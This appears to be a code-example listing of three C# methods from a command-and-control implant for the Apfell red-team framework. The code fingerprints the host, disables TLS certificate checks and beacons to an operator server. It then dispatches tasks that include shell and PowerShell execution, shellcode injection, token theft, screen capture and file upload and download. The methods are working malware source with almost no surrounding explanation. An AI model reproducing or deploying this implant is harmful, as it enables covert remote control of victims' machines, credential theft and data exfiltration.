Пример #1
0
        private void SendResult(SCImplant implant)
        {
            if (this.status == "complete" &&
                this.command != "download" &&
                this.command != "screencapture")
            {
                implant.PostResponse(new SCTaskResp(this.id, this.message));
                implant.SendComplete(this.id);
            }
            else if (this.status == "error")
            {
                implant.SendError(this.id, this.message);
            }

            try
            {
                for (int i = 0; i < implant.jobs.Count; ++i)
                {
                    if (implant.jobs[i].shortId == this.shortId)
                    {
                        implant.jobs.RemoveAt(i);
                    }
                }
            }
            catch (Exception e)
            {
                // This should only happen when testing.
                Debug.WriteLine($"[!] Caught exception: {e.Message}");
            }
        }
Пример #2
0
        static void Main(string[] args)
        {
            // Necessary to disable certificate validation
            ServicePointManager.ServerCertificateValidationCallback = 
                delegate { return true; };

            SCImplant implant = new SCImplant()
            {
                uuid = args[2], // Generated when payload is created in Apfell
                endpoint = args[0] + "/api/v1.3/",
                host = Dns.GetHostName(),
                ip = Dns.GetHostEntry(Dns.GetHostName()) // Necessary because the host may have more than one interface
                    .AddressList.FirstOrDefault(ip => ip.AddressFamily == AddressFamily.InterNetwork).ToString(),
                domain = Environment.UserDomainName,
                os = Environment.OSVersion.VersionString,
                architecture = "x64",
                pid = Process.GetCurrentProcess().Id,
                sleep = 5000,
                user = Environment.UserName
            };
            HTTP.crypto.PSK = Convert.FromBase64String(args[1]);

            if (implant.InitializeImplant())
            {
                int shortId = 1;
                while (true)
                {
                    SCTask task = implant.CheckTasking();
                    if (task.command != "none")
                    {
                        task.shortId = shortId;
                        shortId++;

                        Thread t = new Thread(() => task.DispatchTask(implant));
                        t.Start();

                        if (task.command != "jobs" || task.command != "jobkill") // We don't want to add our job tracking jobs.
                        {
                            Job j = new Job
                            {
                                shortId = task.shortId,
                                task = task.command,
                                thread = t
                            };

                            if (task.@params != "") 
                                j.task += " " + task.@params;

                            implant.jobs.Add(j);
                        }


                    }
                    Thread.Sleep(implant.sleep);
                }
            }
        }
Пример #3
0
        /// <summary>
        /// Handle a new task.
        /// </summary>
        /// <param name="implant">The CaramelImplant we're handling a task for</param>
        public void DispatchTask(SCImplant implant)
        {
            if (this.command == "cd")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to change directory " + this.@params);
                ChangeDir.Execute(this);
            }
            else if (this.command == "download")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to send file " + this.@params);
                Download.Execute(this, implant);
            }
            else if (this.command == "execute_assembly")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to execute assembly " + this.@params);
                Tasks.ExecAssembly.Execute(this, implant);
            }
            else if (this.command == "exit")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to exit");
                Exit.Execute(this, implant);
            }
            else if (this.command == "jobs")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to list jobs");
                Jobs.Execute(this, implant);
            }
            else if (this.command == "jobkill")
            {
                Debug.WriteLine($"[-] DispatchTask - Tasked to kill job {this.@params}");
                Jobs.Execute(this, implant);
            }
            else if (this.command == "kill")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to kill PID " + this.@params);
                Kill.Execute(this);
            }
            else if (this.command == "ls")
            {
                string path = this.@params;
                Debug.WriteLine("[-] DispatchTask - Tasked to list directory " + path);
                DirectoryList.Execute(this, implant);
            }
            else if (this.command == "make_token")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to make a token for " + [email protected](' ')[0]);
                Token.Execute(this);
            }
            else if (this.command == "ps")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to list processes");
                ProcessList.Execute(this);
            }
            else if (this.command == "powershell")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to run powershell");
                Powershell.Execute(this);
            }
            else if (this.command == "rev2self")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to revert token");
                Token.Revert(this);
            }
            else if (this.command == "run")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to start process");
                Proc.Execute(this, implant);
            }
            else if (this.command == "screencapture")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to take screenshot.");
                ScreenCapture.Execute(this, implant);
            }
            else if (this.command == "shell")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to run shell command.");
                Proc.Execute(this, implant);
            }
            else if (this.command == "shinject")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to run shellcode.");
                Shellcode.Execute(this);
            }
            else if (this.command == "sleep")
            {
                try
                {
                    int sleep = Convert.ToInt32(this.@params);
                    Debug.WriteLine("[-] DispatchTask - Tasked to change sleep to: " + sleep);
                    implant.sleep = sleep * 1000;
                    this.status   = "complete";
                }
                catch
                {
                    Debug.WriteLine("[-] DispatchTask - ERROR sleep value provided was not int");
                    this.status  = "error";
                    this.message = "Please provide an integer value";
                }
            }
            else if (this.command == "spawn")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to spawn");
                Spawn.Execute(this);
            }
            else if (this.command == "steal_token")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to steal token");
                Token.Execute(this);
            }
            else if (this.command == "upload")
            {
                Debug.WriteLine("[-] DispatchTask - Tasked to get file from server");
                Upload.Execute(this, implant);
            }

            this.SendResult(implant);
        }